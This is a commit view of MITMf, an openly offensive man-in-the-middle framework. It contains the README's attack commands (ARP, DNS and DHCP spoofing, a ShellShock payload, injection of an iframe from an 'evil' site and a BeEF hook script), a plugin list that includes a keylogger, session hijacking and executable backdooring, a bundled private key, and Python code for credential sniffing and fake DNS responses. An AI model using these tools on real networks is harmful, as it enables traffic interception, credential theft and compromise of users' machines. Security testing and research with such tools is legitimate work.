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Initial commit for v1.0 using mitmproxy instead of twisted

Browse source 
Added a plugin system to Net-Creds so you can now add your own parsers,
api hook names might change between now and the offcial release
(will submit a PR to the original repo once completed)

The main MITM HTTP Proxy now uses mitmproxy which is a big deal, cuts
the code down by an insane amount, no more twisted! yay!

Basic plugin have been re-wrote for the new proxy engine

Since we are using mitmproxy we have out of the box support for SSL/TLS!
This commit is contained in:
byt3bl33d3r 2016-02-06 13:27:08 -07:00
commit eea5f53be2
50 changed files with 5525 additions and 0 deletions
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/plugins/old_plugins/
backdoored/
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/

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Contributing
============
Hi! Thanks for taking the time and contributing to MITMf! Pull requests are always welcome!
Submitting Issues/Bug Reporting
=============
Bug reporting is an essential part of any project since it let's people know whats broken!
Before reading on, here's a list of cases where you **shouldn't** be reporting the bug:
- If you haven't installed MITMf using method described in the [installation](https://github.com/byt3bl33d3r/MITMf/wiki/Installation) intructions. (your fault!)
- If you're using and old version of the framework (and by old I mean anything else that **isn't** the current version on Github)
- If you found a bug in a packaged version of MITMf (e.g. Kali Repos), please file a bug report with the distros maintaner
Lately, there has been a sharp **increase** in the volume of bug reports so in order for me to make any sense out of them and to quickly identify, reproduce and push a fix I do pretend a minimal amount of cooperation from the reporter!
Writing the report
==================
**Before submitting a bug familiarize yourself with [Github markdown](https://help.github.com/articles/github-flavored-markdown/) and use it in your report!**
After that, open an issue ticket and please describe the bug in **detail!** MITMf has a lot of moving parts so the more detail the better!
Include in the report:
- The full command string you used
- The full output of: ```pip freeze```
- The full output of MITMf in debug mode (append ```--log debug``` to the command you used)
- The OS you're using (distribution and architecture)
- The full error traceback (If any)
- If the bug resides in the way MITMf sends/receives packets, include a link to a pcap containing a full packet capture
Some good & bad examples
=========================
- How to write a bug report
https://github.com/byt3bl33d3r/MITMf/issues/71
https://github.com/byt3bl33d3r/MITMf/issues/70
https://github.com/byt3bl33d3r/MITMf/issues/64
- How not to write a bug report
https://github.com/byt3bl33d3r/MITMf/issues/35 <-- My personal favorite
https://github.com/byt3bl33d3r/MITMf/issues/139
https://github.com/byt3bl33d3r/MITMf/issues/138
https://github.com/byt3bl33d3r/MITMf/issues/128
https://github.com/byt3bl33d3r/MITMf/issues/52

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#Intentional contributors (in no particular order)
- @rthijssen
- @ivangr0zni (Twitter)
- @xtr4nge
- @DrDinosaur
- @secretsquirrel
- @binkybear
- @0x27
- @golind
- @mmetince
- @niallmerrigan
- @auraltension
- @HAMIDx9
#Unintentional contributors and/or projects that I stole code from
- Metasploit Framework's os.js and Javascript Keylogger module
- Responder by Laurent Gaffie
- The Backdoor Factory and BDFProxy
- ARPWatch module from the Subterfuge Framework
- Impacket's KarmaSMB script

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combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
{one line to give the program's name and a brief idea of what it does.}
Copyright (C) {year} {name of author}
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
{project} Copyright (C) {year} {fullname}
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<http://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<http://www.gnu.org/philosophy/why-not-lgpl.html>.

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![Supported Python versions](https://img.shields.io/badge/python-2.7-blue.svg)
![Latest Version](https://img.shields.io/badge/mitmf-0.9.8%20--%20The%20Dark%20Side-red.svg)
![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg)
[![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf)
[![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf)
[![Coverage Status](https://coveralls.io/repos/byt3bl33d3r/MITMf/badge.svg?branch=master&service=github)](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master)
#MITMf
Framework for Man-In-The-Middle attacks
Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
Contact me at:
- Twitter: @byt3bl33d3r
- IRC on Freenode: #MITMf
- Email: byt3bl33d3r@gmail.com
**Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .**
Installation
============
Please refer to the wiki for [installation instructions](https://github.com/byt3bl33d3r/MITMf/wiki/Installation)
Description
============
MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving
existing attacks and techniques.
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely
re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
Features
========
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better),
allowing users to modify any type of traffic or protocol.
- The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using [Net-Creds](https://github.com/DanMcInerney/net-creds), which is run on startup.
- [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
Active packet filtering/modification
====================================
You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)
For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:
```python
if packet.haslayer(ICMP):
log.info('Got an ICMP packet!')
packet.dst = '192.168.1.0'
```
- Use the ```packet``` variable to access the packet in a Scapy compatible format
- Use the ```data``` variable to access the raw packet data
Now to use the filter all we need to do is: ```python mitmf.py -F ~/filter.py```
You will probably want to combine that with the **Spoof** plugin to actually intercept packets from someone else ;)
**Note**: you can modify filters on-the-fly without restarting MITMf!
Examples
========
The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:
```python mitmf.py -i enp3s0```
ARP poison the whole subnet with the gateway at 192.168.1.1 using the **Spoof** plugin:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1```
Same as above + a WPAD rogue proxy server using the **Responder** plugin:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad```
ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1```
Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
Enable LLMNR/NBTNS/MDNS spoofing:
```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
```python mitmf.py -i enp3s0 --spoof --dhcp```
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
Inject an HTML IFrame using the **Inject** plugin:
```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
Inject a JS script:
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run ```python mitmf.py --help```
#Currently available plugins
- **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application
- **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients
- **ScreenShotter** : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
- **Responder** : LLMNR, NBT-NS, WPAD and MDNS poisoner
- **SSLstrip+** : Partially bypass HSTS
- **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type
- **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks
- **Ferret-NG** : Transperently hijacks client sessions
- **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients
- **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- **Inject** : Inject arbitrary content into HTML content
- **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins
- **JSkeylogger** : Injects a Javascript keylogger into a client's webpages
- **Replace** : Replace arbitary content in HTML content
- **SMBAuth** : Evoke SMB challenge-response authentication attempts
- **Upsidedownternet** : Flips images 180 degrees

21
config/certs/cert.pem Normal file
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-----BEGIN CERTIFICATE-----
MIIDXTCCAkWgAwIBAgIJAPZfDf283zQfMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV
BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX
aWRnaXRzIFB0eSBMdGQwHhcNMTYwMjA0MDUyMTIzWhcNMTcwMTI5MDUyMTIzWjBF
MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50
ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEAwvcPtKJQXziUUKVw6dKBcJ+F/Ajdj6XElq2+niciLYc/XMXj/NLmdBOY
B9VztUMdC23LztXXYnnYkO4EVKSuACBXmgs3hlCImzZGsIXTwt2NkHMT/w2BYiOn
DZxuBn5WdFKWSESOMALUy7KHNGzEIwjCP29+i2ihG1fLvmDYY/ywfn7smNMNYqYr
rUxiMLRfCnuD+R3QzDcwihHQYRmbxCPs+51RG+BIyBYqP1WuLiUtD+KyTlxyeP9w
nM+QIZrQttmul3GsGK+PcKKHX1Q2j0UBUIyJmVL5xujUNman2VUNGjWNqQnX3tEn
8L6tEoN81lNW4Lpygczka2KQjiN1nQIDAQABo1AwTjAdBgNVHQ4EFgQU0c2PST/v
FGyEyxICVdyr9T9qHN4wHwYDVR0jBBgwFoAU0c2PST/vFGyEyxICVdyr9T9qHN4w
DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAtAEzmF4+n67NHR+f+f4V
TApXpaKORI9x8BASjEIISayJdbaaa4NQr4gS0JCu0OZ8XT3VkQjzTT29J1P7/c0V
/WiP0dHzIq3weBNUFbgIo4c7nkM9xwgOlIEVi6u/o/7CfbCZVryvV0X8reEkp72A
i7BTGb86bZXniu3T66TR9qTC5w4RL+YQkIFl2T1X3OdjkCaTfcHvckAOa/EGOJHy
oEFV/9y3EkJpABZfBHLrrEaLkJHwkleyDFQJqipyrH6yQaLXUJpXsFrEpcym2hAt
ruu+g601VlMdaYbcPQkUkA6FHG6qFV35Cd3/z1JVf69HdU8Ha8zO8pHS678f1uHO
zw==
-----END CERTIFICATE-----

2
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#!/bin/bash
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360 -nodes

28
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-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDC9w+0olBfOJRQ
pXDp0oFwn4X8CN2PpcSWrb6eJyIthz9cxeP80uZ0E5gH1XO1Qx0LbcvO1ddiediQ
7gRUpK4AIFeaCzeGUIibNkawhdPC3Y2QcxP/DYFiI6cNnG4GflZ0UpZIRI4wAtTL
soc0bMQjCMI/b36LaKEbV8u+YNhj/LB+fuyY0w1ipiutTGIwtF8Ke4P5HdDMNzCK
EdBhGZvEI+z7nVEb4EjIFio/Va4uJS0P4rJOXHJ4/3Ccz5AhmtC22a6XcawYr49w
oodfVDaPRQFQjImZUvnG6NQ2ZqfZVQ0aNY2pCdfe0Sfwvq0Sg3zWU1bgunKBzORr
YpCOI3WdAgMBAAECggEASC39o4tgJBCnYEAP0JE9mLuGeCu0E0V0xbAnXRfx4Fct
DyS4ZlaSOTEz3NqajuX878lDZhznM68WjXmBIvEg9i0DIaW7db+FA6mRfDLflko9
6deg9JFEcFfwtepPFZpaWZBl0PWIip/RtmQvCCqoZqwMdj3J5MTkuGHFrYLfOgyi
tKywgAQzXAKUyW8Tq3+D7o+jmBETuq6WhJoQVmuUDffS1G690agJoWseyo7ANeWG
ozkEmEQP5bNWU8XzQTZBZicaktvYOCxqNzZFOBFg4Xo3oRIUQNZiRZG3gxtVMVYa
N/LR+AXLn5DB+palO6WN6AB4j5JO/zlyMrqbfdFnYQKBgQDlS9HeR1E8I2qxd7VN
gCiOV2iWfXVJsArG8gAatPUPU6qU7WOqIjqIR9XqImnac/iBno5fDYDZ9ohJ4AKK
G8NEwDcrkH9tQyzKaY0wFjf3Tz9pI0csp3v4h5Trb+6UAdjHxW5mhwKZhcsKtupu
+cxel9vsvAtXOYgmJ9rDH29RdQKBgQDZq7Pu8VOx3bBE36dBJUqgV+APN8QMC5LG
z3zYeagq+Tzo4xYlNCTbfFmHTeS31YElcnORm2Zh6RUZpHpQR4RQSv7jnJ51ci/o
fmD/eenFe2Q8dtCXWyy906Ik+IkPwF1vUDAVeN2qZa5drbcU1A0lQSyR87JnLk7r
pwzLyuOmiQKBgDHvEQUXAtnV3KZJK3J1Nl/JKT2clK43aCFrEhq+zZ9I2R0VlV63
lYeYHT2fwO2R08xmexq4FhdhWMy9u8/Xu+587YbPMPDacCakVdri+80ftO9wf096
KcU1wXiEJ7CTtmHK3P/25toICO+MZgFE5Py0lXA4gz+7h6rHgxx6/AMBAoGAbHLL
tyStWlTlWatEnYSC5dhiXbKfDpFFk6AUx5X1X1PGMRHTGr4cDu6pfGwmpCDPs2SO
h+Ew5V9Hj/sOpai8F3UGAUkq+cDmdaNhmGeZPTb4/dcEniRi6kDi7CCXyS1CYA9H
pasOZbM7aJkAOnRcCE+scRtFq3q6/1W/Xlm7imECgYEAgZRO2CgDO4y+4OCnGYyI
GzNYfVpPywWDlexvHJ5aHrTA3+qnTxFVgxG8WBo2U89y5tTzsqTAWS87kZ1N+ocO
FFbNNvtsbepafAUHtQu61hx57XF3zx5P/3b2S9cLqT31oKc4T+KyKZBIMElyuvb6
dRG82Pq2qdThn64RhnpacIU=
-----END PRIVATE KEY-----

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import logging
import sys
from datetime import datetime
class ProxyLoggerAdapter(logging.LoggerAdapter):
def process(self, msg, kwargs):
return '[{}] {} [type:{}-{} os:{}] {}'.format(self.extra['proxy'],
self.extra['client'],
self.extra['browser'],
self.extra['browser_v'],
self.extra['os'],
msg), kwargs
class DebugLoggerAdapter(logging.LoggerAdapter):
def process(self, msg, kwargs):
return '[DEBUG][{}] {}'.format(self.extra['source'], msg), kwargs
class NetCredsAdapter(logging.LoggerAdapter):
def __init__(self, logger, extra):
self.logger = logger
self.extra = extra
self.extra['dst_ip_port'] = None
def process(self, msg, kwargs):
if self.extra['dst_ip_port'] is not None:
return '[Net-Creds][{}][{} > {}] {}'.format(self.extra['parser'],
self.extra['src_ip_port'],
self.extra['dst_ip_port'],
msg), kwargs
else:
return '[Net-Creds][{}][{}] {}'.format(self.extra['parser'],
self.extra['src_ip_port'].split(':')[0],
msg), kwargs
def setup_logger(level=logging.INFO):
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%m-%d-%Y %H:%M:%S")
fileHandler = logging.FileHandler('./logs/MITMf_{}.log'.format(datetime.now().strftime('%Y-%m-%d')))
fileHandler.setFormatter(formatter)
streamHandler = logging.StreamHandler(sys.stdout)
streamHandler.setFormatter(formatter)
mitmf_logger = logging.getLogger('MITMf')
mitmf_logger.propagate = False
mitmf_logger.addHandler(streamHandler)
mitmf_logger.addHandler(fileHandler)
mitmf_logger.setLevel(level)

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#!/usr/bin/env python2
import logging
import threading
from core.logger import NetCredsAdapter, DebugLoggerAdapter
from collections import OrderedDict
# stfu scapy
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb=0
pkt_frag_loads = OrderedDict()
challenge_acks = OrderedDict()
netcreds_logger = NetCredsAdapter(logging.getLogger('MITMf'), {})
debug_logger = DebugLoggerAdapter(logging.getLogger('MITMf'), {'source': 'Net-Creds'})
from parsers import *
#Get everything that inherits from the Parser class
parsers = [parser(netcreds_logger) for parser in parser.Parser.__subclasses__()]
debug_logger.debug('Loaded {} parser(s)'.format(len(parsers)))
class NetCreds:
def frag_remover(self, ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(self, ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def pkt_parser(self, pkt):
'''
Start parsing packets here
'''
if pkt.haslayer(Raw):
load = pkt[Raw].load
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
return
# UDP
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
for parser in parsers:
parser.logger.extra['src_ip_port'] = src_ip_port
parser.logger.extra['dst_ip_port'] = dst_ip_port
parser_hook = getattr(parser, 'UDP_Parser')
parser_hook(pkt, src_ip_port, dst_ip_port)
# TCP
elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
ack = str(pkt[TCP].ack)
seq = str(pkt[TCP].seq)
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
self.frag_remover(ack, load)
pkt_frag_loads[src_ip_port] = self.frag_joiner(ack, src_ip_port, load)
full_load = pkt_frag_loads[src_ip_port][ack]
for parser in parsers:
parser.logger.extra['src_ip_port'] = src_ip_port
parser.logger.extra['dst_ip_port'] = dst_ip_port
parser_hook = getattr(parser, 'TCP_Parser')
parser_hook(full_load, src_ip_port, dst_ip_port) #PHRASING!
def start_sniffer(self, options, ip):
sniff(iface=options.interface, prn=self.pkt_parser, filter="not host {}".format(ip), store=0)
def start(self, options, ip):
t = threading.Thread(name='Net-Creds', target=self.start_sniffer, args=(options, ip))
t.setDaemon(True)
t.start()

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# DNSChef is a highly configurable DNS Proxy for Penetration Testers
# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/
# for the latest version and documentation. Please forward all issues and
# concerns to iphelix [at] thesprawl.org.
# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading, random, operator, time
import SocketServer, socket, sys, os
import binascii
import string
import base64
import time
import logging
from configobj import ConfigObj
from core.configwatcher import ConfigWatcher
from core.utils import shutdown
from core.logger import logger
from dnslib import *
from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DNSChef", formatter)
dnslog = logging.getLogger('dnslog')
handler = logging.FileHandler('./logs/dns/dns.log',)
handler.setFormatter(formatter)
dnslog.addHandler(handler)
dnslog.setLevel(logging.INFO)
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
# calculate an appropriate response based on user parameters.
class DNSHandler():
def parse(self,data):
nametodns = DNSChef().nametodns
nameservers = DNSChef().nameservers
hsts = DNSChef().hsts
hstsconfig = DNSChef().real_records
server_address = DNSChef().server_address
clientip = {"clientip": self.client_address[0]}
response = ""
try:
# Parse data as DNS
d = DNSRecord.parse(data)
except Exception as e:
log.info("Error: invalid DNS request", extra=clientip)
dnslog.info("Error: invalid DNS request", extra=clientip)
else:
# Only Process DNS Queries
if QR[d.header.qr] == "QUERY":
# Gather query parameters
# NOTE: Do not lowercase qname here, because we want to see
# any case request weirdness in the logs.
qname = str(d.q.qname)
# Chop off the last period
if qname[-1] == '.': qname = qname[:-1]
qtype = QTYPE[d.q.qtype]
# Find all matching fake DNS records for the query name or get False
fake_records = dict()
for record in nametodns:
fake_records[record] = self.findnametodns(qname, nametodns[record])
if hsts:
if qname in hstsconfig:
response = self.hstsbypass(hstsconfig[qname], qname, nameservers, d)
return response
elif qname[:4] == 'wwww':
response = self.hstsbypass(qname[1:], qname, nameservers, d)
return response
elif qname[:3] == 'web':
response = self.hstsbypass(qname[3:], qname, nameservers, d)
return response
# Check if there is a fake record for the current request qtype
if qtype in fake_records and fake_records[qtype]:
fake_record = fake_records[qtype]
# Create a custom response to the query
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
ipv6 = IP(fake_record)
ipv6_bin = ipv6.strBin()
ipv6_hex_tuple = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](ipv6_hex_tuple)))
elif qtype == "SOA":
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
# dnslib doesn't like trailing dots
if mname[-1] == ".": mname = mname[:-1]
if rname[-1] == ".": rname = rname[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
elif qtype == "NAPTR":
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
order = int(order)
preference = int(preference)
# dnslib doesn't like trailing dots
if replacement[-1] == ".": replacement = replacement[:-1]
response.add_answer( RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,DNSLabel(replacement))) )
elif qtype == "SRV":
priority, weight, port, target = fake_record.split(" ")
priority = int(priority)
weight = int(weight)
port = int(port)
if target[-1] == ".": target = target[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
elif qtype == "DNSKEY":
flags, protocol, algorithm, key = fake_record.split(" ")
flags = int(flags)
protocol = int(protocol)
algorithm = int(algorithm)
key = base64.b64decode(("".join(key)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
elif qtype == "RRSIG":
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
